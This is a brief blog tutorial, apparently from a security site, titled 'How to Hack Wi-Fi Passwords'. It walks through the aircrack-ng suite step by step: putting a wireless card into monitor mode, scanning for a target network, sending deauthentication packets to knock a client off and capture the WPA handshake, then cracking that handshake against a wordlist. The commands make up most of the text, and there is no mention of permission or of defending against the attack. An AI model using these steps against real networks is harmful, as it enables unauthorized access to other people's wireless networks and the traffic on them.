Register Now

Login

Lost Password

Lost your password? Please enter your email address. You will receive a link and will create a new password via email.

Login

Register Now

Canyoupwn.me ~

EN | How to Hack Wi-Fi Passwords

Speaking of business by capturing the theoretical part of the handshake between the client router will try to find the password through wordlist at hand.

 

airmon-ng check kill

This command kill procces.

1

 

airmon-ng

We are viewing WiFi units.

2

 

airmon-ng start [monitor interface]

View a modem interface by typing the name we have achieved in the previous screen in the command interface to monitor active part we make .

3

 

airodump-ng [monitor interface]

We are starting to crawl.

5

 

  • At the end of scan we takes “BSSID” and “CH” values.

6

 

airodump-ng -c [channel] –bssid [bssid] -w [file storage location] [monitor interface]

We are entering “BSSID”, “Channel” and “file storage location” values.

7

 

aireplay-ng –0 2 –a [router bssid] –c [client bssid] [monitor interface]

In the previous step we find the target depent clients and fill the “router bssid”, “client bssid” and “monitor interface” parameters.

9

 

aircrack-ng -a2 -b [router bssid] -w [path to wordlist] [path the handshake location]*.cap

After catching handshake we fill the paremeters and comparison begins. If we find the key we see the following screens.

12

About Mustafa Kaan Demirhan

Security Researcher

Follow Me